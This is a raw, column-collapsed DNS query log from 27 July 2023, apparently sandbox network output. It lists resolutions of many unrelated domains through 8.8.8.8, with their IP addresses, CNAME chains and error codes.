                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.367518902 CEST8.8.8.8192.168.2.40x46b1No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.368031979 CEST8.8.8.8192.168.2.40x6891No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.378953934 CEST8.8.8.8192.168.2.40xf58dServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.416989088 CEST8.8.8.8192.168.2.40x5145Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.479720116 CEST8.8.8.8192.168.2.40xd63cNo error (0)umcor.am188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.479720116 CEST8.8.8.8192.168.2.40xd63cNo error (0)umcor.am188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.499547005 CEST8.8.8.8192.168.2.40x4ec6No error (0)umcor.am188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.499547005 CEST8.8.8.8192.168.2.40x4ec6No error (0)umcor.am188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.509227991 CEST8.8.8.8192.168.2.40x79d9No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.527251959 CEST8.8.8.8192.168.2.40x63fcNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.527251959 CEST8.8.8.8192.168.2.40x63fcNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.542716026 CEST8.8.8.8192.168.2.40x3f30No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.542716026 CEST8.8.8.8192.168.2.40x3f30No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.542716026 CEST8.8.8.8192.168.2.40x3f30No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.556418896 CEST8.8.8.8192.168.2.40xd9afNo error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.556418896 CEST8.8.8.8192.168.2.40xd9afNo error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.587907076 CEST8.8.8.8192.168.2.40x2d7dNo error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.599551916 CEST8.8.8.8192.168.2.40x376eNo error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.653165102 CEST8.8.8.8192.168.2.40x2851Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.710084915 CEST8.8.8.8192.168.2.40x6e08No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.714766026 CEST8.8.8.8192.168.2.40x413cNo error (0)rkengg.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.714766026 CEST8.8.8.8192.168.2.40x413cNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.714766026 CEST8.8.8.8192.168.2.40x413cNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.714766026 CEST8.8.8.8192.168.2.40x413cNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.724416971 CEST8.8.8.8192.168.2.40xeef5Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.766798973 CEST8.8.8.8192.168.2.40xb24dNo error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.766798973 CEST8.8.8.8192.168.2.40xb24dNo error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.801162004 CEST8.8.8.8192.168.2.40xd02bNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.837100029 CEST8.8.8.8192.168.2.40xdbccNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.908891916 CEST8.8.8.8192.168.2.40x2634No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.958755016 CEST8.8.8.8192.168.2.40xf6adNo error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.964528084 CEST8.8.8.8192.168.2.40x6aabNo error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.022604942 CEST8.8.8.8192.168.2.40x5ae4Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.036124945 CEST8.8.8.8192.168.2.40xa5c6No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.066283941 CEST8.8.8.8192.168.2.40xe95fNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.074785948 CEST8.8.8.8192.168.2.40x9e56No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.180413008 CEST8.8.8.8192.168.2.40x8a2fNo error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.220385075 CEST8.8.8.8192.168.2.40x96f8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.280531883 CEST8.8.8.8192.168.2.40x241cNo error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.280531883 CEST8.8.8.8192.168.2.40x241cNo error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.280531883 CEST8.8.8.8192.168.2.40x241cNo error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.423887968 CEST8.8.8.8192.168.2.40x341No error (0)anduran.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.423887968 CEST8.8.8.8192.168.2.40x341No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.423887968 CEST8.8.8.8192.168.2.40x341No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.423887968 CEST8.8.8.8192.168.2.40x341No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.425333977 CEST8.8.8.8192.168.2.40x96f3No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.555027008 CEST8.8.8.8192.168.2.40xbc12No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.555027008 CEST8.8.8.8192.168.2.40xbc12No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.555027008 CEST8.8.8.8192.168.2.40xbc12No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.575975895 CEST8.8.8.8192.168.2.40x3e72No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.641103983 CEST8.8.8.8192.168.2.40x74ecNo error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.683916092 CEST8.8.8.8192.168.2.40x50f0No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.816235065 CEST8.8.8.8192.168.2.40x4971No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.819955111 CEST8.8.8.8192.168.2.40x3fc9No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.938489914 CEST8.8.8.8192.168.2.40x755eName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.953531981 CEST8.8.8.8192.168.2.40xaa70No error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.084645987 CEST8.8.8.8192.168.2.40x7942No error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.199377060 CEST8.8.8.8192.168.2.40x8645No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.201462030 CEST8.8.8.8192.168.2.40x8037Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.214714050 CEST8.8.8.8192.168.2.40x6998No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.352955103 CEST8.8.8.8192.168.2.40xfe20No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.352955103 CEST8.8.8.8192.168.2.40xfe20No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.368412018 CEST8.8.8.8192.168.2.40xda39No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.368412018 CEST8.8.8.8192.168.2.40xda39No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.369332075 CEST8.8.8.8192.168.2.40x3c74No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.373744011 CEST8.8.8.8192.168.2.40x40d4No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.383951902 CEST8.8.8.8192.168.2.40x96f8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.394963026 CEST8.8.8.8192.168.2.40x6bceNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.411930084 CEST8.8.8.8192.168.2.40x81feNo error (0)dspears.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.411930084 CEST8.8.8.8192.168.2.40x81feNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.411930084 CEST8.8.8.8192.168.2.40x81feNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.411930084 CEST8.8.8.8192.168.2.40x81feNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.499751091 CEST8.8.8.8192.168.2.40xb74No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.526427984 CEST8.8.8.8192.168.2.40x7299No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.526427984 CEST8.8.8.8192.168.2.40x7299No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.763593912 CEST8.8.8.8192.168.2.40xa0deNo error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.848251104 CEST8.8.8.8192.168.2.40xd811No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.848251104 CEST8.8.8.8192.168.2.40xd811No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.848251104 CEST8.8.8.8192.168.2.40xd811No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.927707911 CEST8.8.8.8192.168.2.40xeef5Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.965811968 CEST8.8.8.8192.168.2.40x2c66No error (0)aiolos-sa.gr188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.965811968 CEST8.8.8.8192.168.2.40x2c66No error (0)aiolos-sa.gr188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.024725914 CEST8.8.8.8192.168.2.40x4b1bNo error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.072416067 CEST8.8.8.8192.168.2.40xa3f8No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.360332012 CEST8.8.8.8192.168.2.40x9dfNo error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.360332012 CEST8.8.8.8192.168.2.40x9dfNo error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.360332012 CEST8.8.8.8192.168.2.40x9dfNo error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.360332012 CEST8.8.8.8192.168.2.40x9dfNo error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.423537970 CEST8.8.8.8192.168.2.40x45e5Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.509085894 CEST8.8.8.8192.168.2.40x96f8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.553744078 CEST8.8.8.8192.168.2.40x889eNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.553744078 CEST8.8.8.8192.168.2.40x889eNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.553744078 CEST8.8.8.8192.168.2.40x889eNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.553744078 CEST8.8.8.8192.168.2.40x889eNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.557620049 CEST8.8.8.8192.168.2.40xa026No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.617659092 CEST8.8.8.8192.168.2.40xe7adNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.620795965 CEST8.8.8.8192.168.2.40x6b42Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.950156927 CEST8.8.8.8192.168.2.40x96b9No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.981839895 CEST8.8.8.8192.168.2.40x7acfName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.006699085 CEST8.8.8.8192.168.2.40x30baName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.012845993 CEST8.8.8.8192.168.2.40xdbbNo error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.101772070 CEST8.8.8.8192.168.2.40xcce7No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.109601974 CEST8.8.8.8192.168.2.40xff9dNo error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.187356949 CEST8.8.8.8192.168.2.40xaf5No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.402585983 CEST8.8.8.8192.168.2.40xa229No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.413825035 CEST8.8.8.8192.168.2.40xae11Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.422024965 CEST8.8.8.8192.168.2.40xdcecNo error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.646086931 CEST8.8.8.8192.168.2.40xd687No error (0)umcor.am188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.646086931 CEST8.8.8.8192.168.2.40xd687No error (0)umcor.am188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.728581905 CEST8.8.8.8192.168.2.40x7fe3Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.763149977 CEST8.8.8.8192.168.2.40x402aName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.816992044 CEST8.8.8.8192.168.2.40xbbbdNo error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.884007931 CEST8.8.8.8192.168.2.40xeb5fNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.884383917 CEST8.8.8.8192.168.2.40x8759No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.888972998 CEST8.8.8.8192.168.2.40x3978No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.888972998 CEST8.8.8.8192.168.2.40x3978No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.888972998 CEST8.8.8.8192.168.2.40x3978No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.894880056 CEST8.8.8.8192.168.2.40x14e2No error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.894880056 CEST8.8.8.8192.168.2.40x14e2No error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.894880056 CEST8.8.8.8192.168.2.40x14e2No error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.894880056 CEST8.8.8.8192.168.2.40x14e2No error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.954710007 CEST8.8.8.8192.168.2.40x7402No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.989350080 CEST8.8.8.8192.168.2.40x97c6No error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.992773056 CEST8.8.8.8192.168.2.40xec00No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.017512083 CEST8.8.8.8192.168.2.40x2890Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.019135952 CEST8.8.8.8192.168.2.40xaecdNo error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.019135952 CEST8.8.8.8192.168.2.40xaecdNo error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.031311989 CEST8.8.8.8192.168.2.40xfb62Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.100465059 CEST8.8.8.8192.168.2.40xeb8bNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.100465059 CEST8.8.8.8192.168.2.40xeb8bNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.100465059 CEST8.8.8.8192.168.2.40xeb8bNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.100465059 CEST8.8.8.8192.168.2.40xeb8bNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.101661921 CEST8.8.8.8192.168.2.40x956cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.149442911 CEST8.8.8.8192.168.2.40xab22No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.149442911 CEST8.8.8.8192.168.2.40xab22No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.155107975 CEST8.8.8.8192.168.2.40xcd4fNo error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.155107975 CEST8.8.8.8192.168.2.40xcd4fNo error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.155107975 CEST8.8.8.8192.168.2.40xcd4fNo error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.195235968 CEST8.8.8.8192.168.2.40x13efNo error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.227215052 CEST8.8.8.8192.168.2.40x95e4No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.232799053 CEST8.8.8.8192.168.2.40x187No error (0)revoldia.net154.201.225.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.233721018 CEST8.8.8.8192.168.2.40x69abName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.275234938 CEST8.8.8.8192.168.2.40xf2d5No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.290529013 CEST8.8.8.8192.168.2.40x2e35No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.290529013 CEST8.8.8.8192.168.2.40x2e35No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.412703037 CEST8.8.8.8192.168.2.40xf386Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.414366007 CEST8.8.8.8192.168.2.40x7310No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.414366007 CEST8.8.8.8192.168.2.40x7310No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.414366007 CEST8.8.8.8192.168.2.40x7310No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.414366007 CEST8.8.8.8192.168.2.40x7310No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.518788099 CEST8.8.8.8192.168.2.40xbe24No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.627707958 CEST8.8.8.8192.168.2.40x78d9No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.627707958 CEST8.8.8.8192.168.2.40x78d9No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.644627094 CEST8.8.8.8192.168.2.40x96f8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.814275980 CEST8.8.8.8192.168.2.40xd581No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.884633064 CEST8.8.8.8192.168.2.40x8988No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.971503973 CEST8.8.8.8192.168.2.40x2cd8No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.971503973 CEST8.8.8.8192.168.2.40x2cd8No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.002671957 CEST8.8.8.8192.168.2.40xf678No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.013791084 CEST8.8.8.8192.168.2.40xe13eNo error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.056936979 CEST8.8.8.8192.168.2.40xe779No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
